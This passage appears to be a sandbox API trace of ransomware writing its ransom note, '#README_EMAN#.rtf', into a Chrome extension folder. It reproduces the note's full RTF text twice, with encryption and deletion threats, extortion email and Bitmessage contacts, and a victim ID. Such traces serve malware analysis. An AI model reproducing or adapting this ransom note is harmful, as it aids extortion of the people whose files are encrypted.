r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f3\x0e", lpUsedDefaultChar=0x0) returned 8717 [0288.085] WriteFile (in: hFile=0x2c8, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.086] CloseHandle (hObject=0x2c8) returned 1 [0288.086] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0288.086] GetLastError () returned 0x2 [0288.086] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0288.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 